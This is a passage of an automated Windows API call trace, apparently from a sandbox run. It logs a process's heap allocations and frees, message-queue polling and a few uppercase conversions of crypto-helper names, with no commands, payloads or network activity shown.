Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0259.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0259.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0259.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f197e0 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f1c3c8 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f197e0 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0259.034] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.034] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0259.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.034] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.035] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0259.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0259.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0259.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0259.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f197e0 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f1efb0 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0259.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f197e0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0259.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f197e0 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1efb0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2be0) returned 0x2f1efb0 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f197e0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16bf8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1c3c8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.041] HeapFree (in: 